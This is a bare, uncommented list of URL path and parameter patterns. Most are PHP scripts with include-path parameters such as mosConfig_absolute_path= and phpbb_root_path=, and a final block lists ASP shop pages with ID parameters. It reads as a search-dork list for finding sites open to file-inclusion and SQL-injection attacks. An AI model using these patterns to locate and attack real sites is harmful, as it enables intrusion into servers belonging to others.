  page.php?doc=
  administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  components/com_geria/geria.html.php?mosConfig_absolute_path=
  /functions.php?include_path=
  /modules/coppermine/include/init.inc.php?CPG_M_DIR=
  /include/write.php?dir=
  db.php?path_local=
  index.php?file=
  index.php?content=
  index.php?kobr=
  index.php?l=
  index.php?a=
  index.php?opcao=
  index.php?conteudo=
  index.php?meio=
  index.php?inc=
  index.php?c=
  index.php?arquivo=
  components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
  index.php?show=
  index.php?dept=
  index.php?inhalt=
  principal.php?conteudo=
  main.php?site=
  template.php?name=
  forum.php?act=
  index2.php?content=
  index.phpmain.php?x=
  index.php?canal=
  services.php?page=
  index.php?Language=
  video.php?content=
  pages.php?page=
  print.php?page=
  show.php?page=
  media.php?page=
  index2.php?ascii_seite=
  index2.php?DoAction=
  index1.php?site=
  main.php?link=
  home.php?x=
  /phpopenchat/contrib/yabbse/poc.php?sourcedir=
  /squito/photolist.inc.php?photoroot=
  /spid/lang/lang.php?lang_path=
  /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
  /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
  /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=
  components/com_performs/performs.php?mosConfig_absolute_path=
  /components/com_smf/smf.php?mosConfig_absolute_path=
  /components/com_cpg/cpg.php?mosConfig_absolute_path=
  administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
  inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep=
  /jscript.php?my_ms[root]=
  /popup_window.php?site_isp_root=
  /surveys/survey.inc.php?path=
  index.php?body=
  enc/content.php?Home_Path=
  /sources/functions.php?CONFIG[main_path]=
  /embed/day.php?path=
  /includes/dbal.php?eqdkp_root_path=
  sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
  /includes/kb_constants.php?module_root_path=
  /components/com_facileforms/facileforms.frame.php?ff_compath=
  skins/advanced/advanced1.php?pluginpath[0]=
  /components/com_zoom/includes/database.php?mosConfig_absolute_path=
  /main.php?sayfa=
  /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  /addpost_newpoll.php?addpoll=preview&thispath=
  /header.php?abspath=
  /modules/vwar/admin/admin.php?vwar_root=
  /skin/zero_vote/error.php?dir=
  /modules/TotalCalendar/about.php?inc_dir=
  login.php?dir=
  index.php?pageurl=
  index.php?id=
  content.php?page=
  admin.php?page=
  SQuery/lib/gore.php?libpath=
  index2.php?p=
  config.php?_CCFG[_PKG_PATH_DBSE]=
  akocomments.php?mosConfig_absolute_path=
  index.php?lang=gr&file
  index.php?pag=
  index.php?incl=
  avatar.php?page=
  index.php?x= index.php?mode=index.php?stranica=
  index.php?sub=index.php?id=index.php?t=
  index.php?menu=
  index0.php?show=
  administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= day.php?date=
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=
  index.php?topic=
  index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
  administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=
  /modules/vwar/admin/admin.php?vwar_root=index.php?loc=
  .br/index.php?loc=
  myevent.php?myevent_path=
  includes/functions.php?phpbb_root_path=
  index.php?template=
  search.php?cutepath=
  administrator/components/com_webring/admin.webring.docs.php?component_dir=
  help.php?css_path=
  big.php?pathtotemplate=
  includes/search.php?GlobalSettings[templatesDirectory]=
  interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=
  modules/My_eGery/index.php?basepath=
  /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
  /class.mysql.php?path_to_bt_dir=
  /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  /squirrelcart/cart_content.php?cart_isp_root=
  /modules/Forums/admin/admin_styles.php?phpbb_root_path=
  index.php?url=
  index.php?openfile=
  index.php?side=
  index.php?doc=
  index.php?principal=
  index.php?rage=
  index.php?place=
  index.php?dsp=
  index.php?lg=
  index.php?pilih=
  template.php?pagina=
  contenido.php?sec=
  index_principal.php?pagina=
  home.php?pagina=
  noticias.php?arq=
  default.php?page=
  index.php?meio.php=
  index.php?screen=
  index.php?langc=
  htmltonuke.php?filnavn=
  ihm.php?p=
  folder.php?id=
  index.php?Load=
  h.php?file=
  h.php?page=
  template.php?goto=
  index1.php?menu=
  index.php?ort=
  index2.php?ID=
  index2.php?url_page=
  index1.php?dat=
  port.php?content=
  index1.php?x=
  /contrib/yabbse/poc.php?poc_root_path=
  /photoalb/lib/static/header.php?set_menu=
  /bz/squito/photolist.inc.php?photoroot=
  /ppa/inc/functions.inc.php?config[ppa_root_path]=
  al_initialize.php?alpath=
  /extensions/moblog/moblog_lib.php?basedir=
  modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  /components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
  inc/cmses/aedating4CMS.php?dir[inc]=
  bp_ncom.php?bnrep=
  /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
  /yabbse/Sources/Packages.php?sourcedir=
  /include/main.php?config[search_disp]=true&include_dir=
  /includes/functions_portal.php?phpbb_root_path=
  pagina.php?ir=
  home.php?qry=
  index3.php?url=
  index1.php?action=
  press.php?param=
  view.php?adresa=
  pagina.php?type=
  file.php?ki=
  gery.php?seite=
  include.php?loader=
  index2.php?module=
  gery.php?strona=
  general.php?itemnav=
  template.php?h=
  nota.php?header=
  blank.php?ki=
  enter.php?base_dir=
  general.php?thispage=
  view.php?var=
  include.php?*
  layout.php?pagina=
  padrao.php?ir=
  *inc*.php?left=
  gery.php?eval=
  index2.php?base_dir=
  index1.php?op=
  padrao.php?sivu=
  enter.php?pagina=
  principal.php?recipe=
  file.php?pref=
  standard.php?goto=
  index2.php?phpbb_root_path=
  path.php?action=
  mod*.php?link=
  include.php?nivel=
  head.php?pollname=
  default.php?name=
  standard.php?param=
  general.php?where=
  head.php?*
  principal.php?url=
  home.php?ref=
  down*.php?left=
  standard.php?url=
  press.php?*root*=
  view.php?*
  view.php?second=
  include.php?loc=
  template.php?second=
  index.php?filepath=
  home.php?pr=
  index.php?module=
  file.php?url=
  home.php?itemnav=
  default.php?read=
  view.php?incl=
  down*.php?to=
  principal.php?viewpage=
  index2.php?choix=
  standard.php?seccion=
  page.php?goto=
  *.php?secc=
  index3.php?chapter=
  start.php?seccion=
  base.php?middlePart=
  template.php?panel=
  path.php?menue=
  padrao.php?secc=
  *inc*.php?inc=
  general.php?id=
  standard.php?pref=
  template.php?play=
  layout.php?my=
  padrao.php?seite=
  press.php?i=
  mod*.php?tipo=
  gery.php?ref=
  press.php?inc=
  index2.php?left=
  view.php?phpbb_root_path=
  base.php?k=
  index3.php?pag=
  down*.php?OpenPage=
  sitio.php?strona=
  nota.php?seite=
  index.php?basepath=
  info.php?in=
  start.php?where=
  default.php?n=
  down*.php?filepath=
  main.php?corpo=
  principal.php?filepath=
  view.php?option=
  show.php?*root*=
  principal.php?pre=
  start.php?p=
  standard.php?home=
  enter.php?numero=
  index2.php?oldal=
  general.php?addr=
  general.php?tipo=
  index.php?secao=
  info.php?op=
  template.php?page=
  include.php?sivu=
  index.php?modo=
  show.php?module=
  sitio.php?texto=
  gery.php?oldal=
  press.php?incl=
  principal.php?w=
  index2.php?pname=
  path.php?path=
  *inc*.php?category=
  default.php?pag=
  default.php?pr=
  main.php?adresa=
  default.php?to=
  default.php?opcion=
  main.php?str=
  path.php?in=
  base.php?ev=
  principal.php?choix=
  default.php?m=
  include.php?name=
  path.php?link=
  view.php?pag=
  principal.php?my=
  index1.php?*
  path.php?header=
  *inc*.php?base_dir=
  principal.php?basepath=
  view.php?disp=
  head.php?modo=
  show.php?left=
  gery.php?url=
  sub*.php?*root*=
  mod*.php?section=
  general.php?name=
  base.php?disp=
  principal.php?module=
  sub*.php?OpenPage=
  gery.php?xlink=
  mod*.php?to=
  padrao.php?oldal=
  sub*.php?lang=
  down*.php?x=
  enter.php?sp=
  index2.php?loader=
  enter.php?loader=
  principal.php?disp=
  sub*.php?viewpage=
  template.php?pre=
  mod*.php?goFile=
  press.php?second=
  base.php?seccion=
  sitio.php?doshow=
  *inc*.php?type=
  show.php?filepath=
  sitio.php?qry=
  general.php?pr=
  layout.php?panel=
  pagina.php?go=
  press.php?*
  default.php?var=
  sub*.php?corpo=
  file.php?viewpage=
  press.php?itemnav=
  mod*.php?ev=
  blank.php?OpenPage=
  head.php?tipo=
  sitio.php?sec=
  default.php?cmd=
  blank.php?channel=
  mod*.php?j=
  layout.php?modo=
  head.php?pageweb=
  path.php?type=
  layout.php?g=
  nota.php?base_dir=
  index2.php?showpage=
  index3.php?type=
  base.php?cont=
  mod*.php?chapter=
  sitio.php?ev=
  home.php?sekce=
  sitio.php?sp=
  nota.php?tipo=
  view.php?to=
  include.php?middle=
  include.php?phpbb_root_path=
  index2.php?include=
  nota.php?itemnav=
  include.php?option=
  index2.php?type=
  base.php?link=
  path.php?chapter=
  show.php?sp=
  home.php?section=
  default.php?y=
  gery.php?*
  pagina.php?link=
  index1.php?o=
  gery.php?addr=
  *inc*.php?menu=
  path.php?where=
  pagina.php?home=
  file.php?doshow=
  index3.php?pname=
  nota.php?in=
  path.php?middlePart=
  down*.php?sp=
  page.php?module=
  index3.php?ev=
  standard.php?eval=
  path.php?y=
  template.php?qry=
  start.php?option=
  info.php?subject=
  page.php?abre=
  sub*.php?g=
  home.php?g=
  file.php?play=
  start.php?loader=
  start.php?showpage=
  info.php?ref=
  pagina.php?id=
  blank.php?name=
  head.php?str=
  print.php?header=
  index3.php?mid=
  down*.php?disp=
  blank.php?j=
  path.php?goto=
  default.php?type=
  mod*.php?incl=
  path.php?filepath=
  gery.php?base_dir=
  show.php?middlePart=
  *inc*.php?to=
  layout.php?z=
  view.php?seccion=
  sitio.php?*root*=
  file.php?strona=
  mod*.php?pag=
  index2.php?ref=
  head.php?sekce=
  layout.php?pref=
  path.php?doshow=
  path.php?panel=
  file.php?pagina=
  index2.php?e=
  path.php?sp=
  pagina.php?load=
  general.php?section=
  base.php?filepath=
  include.php?content=
  blank.php?basepath=
  template.php?ref=
  head.php?load=
  main.php?subject=
  file.php?y=
  down*.php?ev=
  padrao.php?choix=
  index.php?channel=
  nota.php?t=
  blank.php?panel=
  sub*.php?header=
  info.php?var=
  enter.php?read=
  head.php?adresa=
  print.php?param=
  default.php?sp=
  start.php?panel=
  template.php?dir=
  show.php?pre=
  view.php?content=
  print.php?strona=
  sitio.php?inc=
  info.php?header=
  info.php?itemnav=
  file.php?to=
  base.php?itemnav=
  standard.php?where=
  sitio.php?modo=
  sitio.php?disp=
  print.php?addr=
  mod*.php?oldal=
  sub*.php?go=
  start.php?load=
  index2.php?option=
  blank.php?mod=
  index3.php?inc=
  standard.php?my=
  enter.php?y=
  base.php?pageweb=
  padrao.php?*root*=
  main.php?action=
  pagina.php?path=
  sub*.php?phpbb_root_path=
  path.php?home=
  index3.php?middle=
  index3.php?get=
  default.php?seccion=
  print.php?numero=
  include.php?in=
  include.php?secao=
  sub*.php?sec=
  home.php?channel=
  base.php?body=
  enter.php?ir=
  home.php?oldal=
  head.php?pag=
  general.php?menu=
  nota.php?seccion=
  path.php?xlink=
  page.php?mid=
  index1.php?link=
  blank.php?sp=
  default.php?panel=
  *inc*.php?doshow=
  blank.php?id=
  print.php?read=
  sitio.php?destino=
  principal.php?d=
  start.php?name=
  default.php?chapter=
  head.php?goto=
  path.php?qry=
  default.php?*root*=
  enter.php?cmd=
  file.php?include=
  enter.php?body=
  index.php?chapter=
  include.php?panel=
  default.php?choix=
  start.php?oldal=
  down*.php?ir=
  nota.php?module=
  info.php?xlink=
  enter.php?lang=
  general.php?redirect=
  view.php?recipe=
  home.php?ir=
  padrao.php?open=
  base.php?subject=
  padrao.php?u=
  sub*.php?my=
  enter.php?type=
  blank.php?ir=
  page.php?showpage=
  home.php?disp=
  index3.php?secc=
  home.php?panel=
  index1.php?pr=
  main.php?ref=
  layout.php?link=
  standard.php?qry=
  index2.php?thispage=
  index3.php?pollname=
  pagina.php?cmd=
  view.php?body=
  head.php?rub=
  standard.php?include=
  path.php?secao=
  press.php?opcion=
  gery.php?tipo=
  index1.php?v=
  pagina.php?secao=
  standard.php?secc=
  gery.php?loader=
  index3.php?include=
  pagina.php?to=
  enter.php?strona=
  sub*.php?s=
  enter.php?get=
  path.php?var=
  general.php?subject=
  enter.php?pa=
  include.php?header=
  include.php?mid=
  blank.php?incl=
  index2.php?corpo=
  index1.php?incl=
  home.php?choix=
  index1.php?c=
  index2.php?var=
  main.php?pref=
  index1.php?pname=
  path.php?incl=
  info.php?recipe=
  view.php?sec=
  file.php?where=
  print.php?name=
  info.php?c=
  principal.php?cont=
  print.php?menue=
  info.php?f=
  padrao.php?xlink=
  index1.php?url=
  gery.php?basepath=
  template.php?mid=
  sub*.php?id=
  start.php?corpo=
  file.php?chapter=
  home.php?chapter=
  standard.php?chapter=
  press.php?page=
  nota.php?n=
  start.php?adresa=
  default.php?e=
  sub*.php?itemnav=
  standard.php?go=
  sitio.php?menu=
  press.php?goFile=
  principal.php?id=
  down*.php?incl=
  principal.php?z=
  main.php?my=
  start.php?ir=
  info.php?ki=
  file.php?loader=
  index.php?mid=
  down*.php?seite=
  base.php?lang=
  nota.php?inc=
  standard.php?index=
  index1.php?var=
  principal.php?p=
  pagina.php?index=
  view.php?qry=
  home.php?tipo=
  page.php?numero=
  index1.php?strona=
  show.php?inc=
  index2.php?redirect=
  pagina.php?middlePart=
  template.php?base_dir=
  info.php?mid=
  home.php?module=
  general.php?left=
  print.php?doshow=
  general.php?page=
  path.php?adresa=
  page.php?seite=
  home.php?menu=
  index2.php?open=
  blank.php?pname=
  sub*.php?modo=
  index2.php?goto=
  path.php?subject=
  general.php?sivu=
  general.php?read=
  principal.php?ev=
  press.php?to=
  main.php?middle=
  print.php?pollname=
  index2.php?strona=
  template.php?f=
  template.php?e=
  press.php?pagina=
  print.php?ki=
  page.php?z=
  enter.php?left=
  head.php?middlePart=
  gery.php?ev=
  index3.php?ref=
  file.php?id=
  print.php?loc=
  sitio.php?body=
  pagina.php?n=
  down*.php?s=
  padrao.php?a=
  page.php?OpenPage=
  gery.php?option=
  mod*.php?sekce=
  template.php?thispage=
  head.php?viewpage=
  file.php?incl=
  sitio.php?e=
  page.php?cont=
  sub*.php?adresa=
  index2.php?pg=
  layout.php?thispage=
  padrao.php?body=
  base.php?t=
  press.php?redirect=
  pagina.php?seccion=
  layout.php?action=
  sitio.php?option=
  index2.php?category=
  pagina.php?lang=
  include.php?ref=
  index3.php?thispage=
  sub*.php?seite=
  layout.php?addr=
  nota.php?mid=
  page.php?p=
  mod*.php?corpo=
  press.php?t=
  blank.php?category=
  *inc*.php?y=
  nota.php?category=
  show.php?d=
  enter.php?menue=
  index1.php?t=
  nota.php?adresa=
  main.php?thispage=
  layout.php?tipo=
  index3.php?d=
  enter.php?b=
  main.php?loc=
  standard.php?z=
  show.php?base_dir=
  sitio.php?middlePart=
  template.php?a=
  page.php?read=
  index.php?param=
  default.php?channel=
  sub*.php?link=
  padrao.php?texto=
  base.php?base_dir=
  file.php?texto=
  base.php?middle=
  pagina.php?base_dir=
  print.php?tipo=
  principal.php?pag=
  index2.php?loc=
  nota.php?option=
  home.php?index=
  print.php?base_dir=
  file.php?get=
  info.php?content=
  default.php?goto=
  start.php?include=
  print.php?option=
  default.php?v=
  base.php?numero=
  index2.php?qry=
  sub*.php?secao=
  sub*.php?secc=
  mod*.php?lang=
  standard.php?pollname=
  default.php?load=
  show.php?j=
  down*.php?pa=
  standard.php?open=
  file.php?disp=
  press.php?xlink=
  print.php?s=
  mod*.php?secc=
  index1.php?param=
  index3.php?sivu=
  mod*.php?pg=
  layout.php?cmd=
  info.php?phpbb_root_path=
  print.php?OpenPage=
  default.php?thispage=
  enter.php?sec=
  path.php?*
  home.php?middlePart=
  index3.php?channel=
  template.php?sekce=
  down*.php?goFile=
  blank.php?header=
  start.php?body=
  base.php?module=
  default.php?l=
  index2.php?texto=
  home.php?eval=
  padrao.php?section=
  blank.php?goFile=
  index.php?index=
  layout.php?ir=
  blank.php?pollname=
  include.php?x=
  start.php?pageweb=
  gery.php?rub=
  template.php?sp=
  sub*.php?basepath=
  standard.php?section=
  enter.php?abre=
  index1.php?pa=
  principal.php?seite=
  gery.php?chapter=
  nota.php?qry=
  pagina.php?pagina=
  default.php?menu=
  standard.php?*
  default.php?abre=
  press.php?pg=
  start.php?nivel=
  index1.php?filepath=
  padrao.php?op=
  mod*.php?pre=
  default.php?pa=
  press.php?strona=
  nota.php?cmd=
  standard.php?abre=
  general.php?seccion=
  index1.php?itemnav=
  layout.php?seite=
  home.php?pollname=
  path.php?left=
  down*.php?inc=
  include.php?channel=
  print.php?dir=
  main.php?disp=
  print.php?pre=
  padrao.php?cont=
  padrao.php?menu=
  path.php?addr=
  base.php?sekce=
  pagina.php?loader=
  page.php?go=
  press.php?category=
  gery.php?left=
  down*.php?qry=
  file.php?second=
  include.php?pag=
  base.php?ir=
  template.php?addr=
  sitio.php?nivel=
  include.php?destino=
  head.php?disp=
  general.php?w=
  gery.php?sec=
  base.php?var=
  enter.php?addr=
  enter.php?go=
  page.php?middle=
  start.php?home=
  info.php?rub=
  pagina.php?OpenPage=
  head.php?content=
  principal.php?pref=
  home.php?in=
  path.php?disp=
  main.php?index=
  file.php?eval=
  press.php?base_dir=
  main.php?content=
  show.php?disp=
  index.php?opcion=
  view.php?loader=
  down*.php?strona=
  principal.php?seccion=
  principal.php?n=
  blank.php?link=
  file.php?sivu=
  info.php?adresa=
  *inc*.php?ki=
  padrao.php?incl=
  main.php?eval=
  gery.php?nivel=
  sub*.php?goFile=
  info.php?sec=
  main.php?include=
  main.php?page=
  base.php?*
  home.php?rub=
  default.php?k=
  index3.php?t=
  file.php?showpage=
  enter.php?home=
  info.php?menue=
  index.php?middlePart=
  blank.php?corpo=
  press.php?where=
  path.php?p=
  page.php?*
  enter.php?path=
  press.php?ir=
  index1.php?path=
  sub*.php?option=
  sub*.php?pag=
  layout.php?where=
  info.php?o=
  file.php?oldal=
  template.php?menue=
  press.php?abre=
  layout.php?OpenPage=
  home.php?play=
  sitio.php?pg=
  main.php?filepath=
  general.php?to=
  index1.php?*root*=
  show.php?qry=
  print.php?where=
  index2.php?itemnav=
  pagina.php?q=
  enter.php?str=
  enter.php?name=
  sitio.php?addr=
  enter.php?incl=
  index3.php?mod=
  template.php?opcion=
  nota.php?pre=
  head.php?lang=
  pagina.php?g=
  include.php?tipo=
  default.php?loc=
  principal.php?destino=
  index3.php?menue=
  index.php?y=
  home.php?opcion=
  print.php?middlePart=
  sitio.php?secc=
  show.php?read=
  standard.php?var=
  info.php?param=
  head.php?start=
  view.php?oldal=
  mod*.php?play=
  gery.php?h=
  pagina.php?mid=
  sub*.php?thispage=
  layout.php?loader=
  enter.php?qry=
  padrao.php?filepath=
  include.php?ir=
  sub*.php?u=
  base.php?chapter=
  press.php?pageweb=
  sub*.php?pa=
  enter.php?texto=
  home.php?link=
  template.php?*
  gery.php?action=
  base.php?oldal=
  index3.php?dir=
  include.php?ki=
  index3.php?body=
  standard.php?oldal=
  nota.php?showpage=
  general.php?f=
  padrao.php?pag=
  *inc*.php?rub=
  index2.php?adresa=
  head.php?sec=
  nota.php?filepath=
  print.php?link=
  gery.php?pname=
  show.php?pname=
  base.php?loc=
  file.php?q=
  gery.php?sivu=
  padrao.php?header=
  layout.php?abre=
  index3.php?pref=
  enter.php?subject=
  page.php?modo=
  page.php?left=
  base.php?abre=
  index3.php?addr=
  blank.php?pr=
  *inc*.php?get=
  print.php?play=
  padrao.php?secao=
  index.php?str=
  general.php?sekce=
  show.php?m=
  head.php?b=
  index1.php?mod=
  home.php?showpage=
  home.php?cmd=
  index1.php?read=
  page.php?load=
  general.php?choix=
  home.php?my=
  start.php?param=
  layout.php?sekce=
  enter.php?module=
  mod*.php?secao=
  show.php?n=
  start.php?pname=
  down*.php?doshow=
  index2.php?pre=
  layout.php?nivel=
  home.php?base_dir=
  include.php?eval=
  standard.php?xlink=
  info.php?home=
  general.php?body=
  head.php?play=
  file.php?index=
  mod*.php?OpenPage=
  index.php?b=
  principal.php?ki=
  sub*.php?panel=
  path.php?sec=
  nota.php?left=
  default.php?header=
  padrao.php?qry=
  file.php?corpo=
  padrao.php?strona=
  sub*.php?z=
  pagina.php?include=
  page.php?link=
  start.php?abre=
  print.php?goFile=
  *inc*.php?c=
  down*.php?cmd=
  home.php?middle=
  sub*.php?open=
  include.php?second=
  sitio.php?menue=
  path.php?tipo=
  home.php?addr=
  gery.php?pref=
  pagina.php?k=
  head.php?strona=
  general.php?e=
  blank.php?get=
  blank.php?sivu=
  sitio.php?read=
  home.php?thispage=
  pagina.php?loc=
  layout.php?qry=
  print.php?*root*=
  show.php?to=
  view.php?u=
  view.php?chapter=
  principal.php?nivel=
  info.php?secao=
  nota.php?abre=
  standard.php?menu=
  index2.php?pollname=
  index3.php?path=
  index.php?base_dir=
  general.php?secao=
  mod*.php?home=
  down*.php?section=
  default.php?index=
  general.php?doshow=
  padrao.php?abre=
  enter.php?seite=
  down*.php?lang=
  main.php?xlink=
  index3.php?base_dir=
  gery.php?redirect=
  layout.php?basepath=
  pagina.php?modo=
  index.php?adresa=
  down*.php?u=
  main.php?mod=
  file.php?start=
  view.php?redirect=
  index2.php?u=
  padrao.php?*
  info.php?ev=
  index1.php?nivel=
  include.php?seccion=
  view.php?lang=
  mod*.php?include=
  mod*.php?seccion=
  principal.php?pollname=
  include.php?read=
  press.php?rub=
  index2.php?incl=
  pagina.php?chapter=
  view.php?middle=
  print.php?sekce=
  padrao.php?pname=
  head.php?ref=
  principal.php?link=
  gery.php?menue=
  template.php?op=
  info.php?doshow=
  default.php?sivu=
  nota.php?pagina=
  sitio.php?content=
  press.php?thispage=
  press.php?pa=
  index1.php?redirect=
  padrao.php?menue=
  index2.php?sekce=
  mod*.php?d=
  include.php?filepath=
  principal.php?l=
  layout.php?oldal=
  include.php?b=
  layout.php?pollname=
  start.php?play=
  print.php?r=
  info.php?*
  sub*.php?*
      * *=
  mod*.php?addr=
  base.php?category=
  index2.php?d=
  mod*.php?phpbb_root_path=
  default.php?include=
  press.php?module=
  default.php?module=
  info.php?pname=
  path.php?id=
  general.php?get=
  press.php?path=
  padrao.php?sekce=
  base.php?ki=
  file.php?cmd=
  layout.php?section=
  press.php?include=
  mod*.php?destino=
  base.php?doshow=
  principal.php?load=
  print.php?type=
  index1.php?adresa=
  index3.php?pre=
  standard.php?cont=
  gery.php?open=
  blank.php?read=
  sitio.php?redirect=
  index1.php?cmd=
  info.php?redirect=
  file.php?load=
  index3.php?itemnav=
  gery.php?mod=
  enter.php?ref=
  down*.php?t=
  view.php?goFile=
  file.php?var=
  sitio.php?ir=
  show.php?b=
  sitio.php?param=
  sub*.php?rub=
  print.php?opcion=
  press.php?middle=
  info.php?ir=
  home.php?basepath=
  blank.php?section=
  include.php?to=
  start.php?sp=
  index3.php?name=
  template.php?showpage=
  view.php?ki=
  index1.php?sekce=
  press.php?option=
  nota.php?home=
  gery.php?my=
  show.php?mid=
  blank.php?o=
  sitio.php?pr=
  index3.php?destino=
  main.php?body=
  blank.php?lang=
  path.php?thispage=
  padrao.php?OpenPage=
  info.php?pageweb=
  blank.php?h=
  head.php?incl=
  principal.php?ref=
  start.php?go=
  file.php?action=
  template.php?t=
  base.php?mid=
  start.php?b=
  start.php?lang=
  default.php?rub=
  head.php?read=
  show.php?cmd=
  press.php?get=
  principal.php?secc=
  gery.php?menu=
  gery.php?corpo=
  include.php?module=
  page.php?redirect=
  gery.php?filepath=
  general.php?ir=
  file.php?ref=
  index1.php?seite=
  include.php?pageweb=
  show.php?seccion=
  mod*.php?pagina=
  sub*.php?name=
  padrao.php?c=
  padrao.php?eval=
  file.php?ev=
  default.php?body=
  enter.php?itemnav=
  blank.php?var=
  index.php?addr=
  blank.php?oldal=
  nota.php?url=
  index2.php?action=
  blank.php?phpbb_root_path=
  mod*.php?var=
  mod*.php?strona=
  nota.php?nivel=
  template.php?content=
  mod*.php?content=
  default.php?f=
  view.php?goto=
  principal.php?abre=
  pagina.php?filepath=
  nota.php?link=
  template.php?tipo=
  index3.php?q=
  page.php?adresa=
  sitio.php?category=
  index2.php?link=
  sub*.php?k=
  layout.php?numero=
  tools/send_reminders.php?includedir=
  module_db.php?pivot_path=
  inc/cmses/aedatingCMS.php?dir[inc]=
  modules/vwar/admin/admin.php?vwar_root=
  bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=
  index.php?RP_PATH=
  index.php?pagename=
  smarty_config.php?root_dir=
  components/com_forum/download.php?phpbb_root_path=
  include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
  classes/adodbt/sql.php?classes_dir=
  send_reminders.php?includedir=
  components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
  inc/functions.inc.php?config[ppa_root_path]=
  components/com_cpg/cpg.php?mosConfig_absolute_path=
  admin/index.php?o=
  index.php?menu=deti&page=
  modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
  m2f/m2f_phpbb204.php?m2f_root_path=
  components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  admin/doeditconfig.php?thispath=../includes&config[path]=
  components/com_simpleboard/image_upload.php?sbp=
  wamp_dir/setup/yesno.phtml?no_url=
  include/new-visitor.inc.php?lvc_include_dir=
  support/mailling/maillist/inc/initdb.php?absolute_path=
  coppercop/theme.php?THEME_DIR=
  inc/header.php/step_one.php?server_inc=
  inc/pipe.php?HCL_path=
  include/new-visitor
  "add.asp?bookid="
  "add_cart.asp?num="
  "addcart.asp?"
  "addItem.asp"
  "add-to-cart.asp?ID="
  "addToCart.asp?idProduct="
  "addtomylist.asp?ProdId="
  "adminEditProductFields.asp?intProdID="
  "advSearch_h.asp?idCategory="
  "affiliate.asp?ID="
  "affiliate-agreement.cfm?storeid="
  "affiliates.asp?id="
  "ancillary.asp?ID="
  "archive.asp?id="
  "article.asp?id="
  "aspx?PageID"
  "basket.asp?id="
  "Book.asp?bookID="
  "book_list.asp?bookid="
  "book_view.asp?bookid="
  "BookDetails.asp?ID="
  "browse.asp?catid="
  "browse_item_details.asp"
  "Browse_Item_Details.asp?Store_Id="
  "buy.asp?"
  "buy.asp?bookid="
  "bycategory.asp?id="
  "cardinfo.asp?card="
  "cart.asp?action="
  "cart.asp?cart_id="
  "cart.asp?id="
  "cart_additem.asp?id="
  "cart_validate.asp?id="
  "cartadd.asp?id="
  "cat.asp?iCat="
  "catalog.asp"
  "catalog.asp?CatalogID="
  "catalog_item.asp?ID="
  "catalog_main.asp?catid="
  "category.asp"
  "category.asp?catid="
  "category_list.asp?id="
  "categorydisplay.asp?catid="
  "checkout.asp?cartid="
  "checkout.asp?UserID="
  "checkout_confirmed.asp?order_id="
  "checkout1.asp?cartid="
  "comersus_listCategoriesAndProducts.asp?idCategory ="
  "comersus_optEmailToFriendForm.asp?idProduct="
  "comersus_optReviewReadExec.asp?idProduct="
  "comersus_viewItem.asp?idProduct="
  "comments_form.asp?ID="
  "contact.asp?cartId="
  "content.asp?id="
  "customerService.asp?TextID1="
  "default.asp?catID="
  "description.asp?bookid="
  "details.asp?BookID="
  "details.asp?Press_Release_ID="
  "details.asp?Product_ID="
  "details.asp?Service_ID="
  "display_item.asp?id="
  "displayproducts.asp"
  "downloadTrial.asp?intProdID="
  "emailproduct.asp?itemid="
  "emailToFriend.asp?idProduct="
  "events.asp?ID="
  "faq.asp?cartID="
  "faq_list.asp?id="
  "faqs.asp?id="
  "feedback.asp?title="
  "freedownload.asp?bookid="
  "fullDisplay.asp?item="
  "getbook.asp?bookid="
  "GetItems.asp?itemid="
  "giftDetail.asp?id="
  "help.asp?CartId="
  "home.asp?id="
  "index.asp?cart="
  "index.asp?cartID="
  "index.asp?ID="
  "info.asp?ID="
  "item.asp?eid="
  "item.asp?item_id="
  "item.asp?itemid="
  "item.asp?model="
  "item.asp?prodtype="
  "item.asp?shopcd="
  "item_details.asp?catid="
  "item_list.asp?maingroup"
  "item_show.asp?code_no="
  "itemDesc.asp?CartId="
  "itemdetail.asp?item="
  "itemdetails.asp?catalogid="
  "learnmore.asp?cartID="
  "links.asp?catid="
  "list.asp?bookid="
  "List.asp?CatID="
  "listcategoriesandproducts.asp?idCategory="
  "modline.asp?id="
  "myaccount.asp?catid="
  "news.asp?id="
  "order.asp?BookID="
  "order.asp?id="
  "order.asp?item_ID="
  "OrderForm.asp?Cart="
  "page.asp?PartID="
  "payment.asp?CartID="
  "pdetail.asp?item_id="
  "powersearch.asp?CartId="
  "price.asp"
  "privacy.asp?cartID="
  "prodbycat.asp?intCatalogID="
  "prodetails.asp?prodid="
  "prodlist.asp?catid="
  "product.asp?bookID="
  "product.asp?intProdID="
  "product_info.asp?item_id="
  "productDetails.asp?idProduct="
  "productDisplay.asp"
  "productinfo.asp?item="
  "productlist.asp?ViewType=Category&CategoryID= "
  "productpage.asp"
  "products.asp?ID="
  "products.asp?keyword="
  "products_category.asp?CategoryID="
  "products_detail.asp?CategoryID="
  "productsByCategory.asp?intCatalogID="
  "prodView.asp?idProduct="
  "promo.asp?id="
  "promotion.asp?catid="
  "pview.asp?Item="
  "resellers.asp?idCategory="
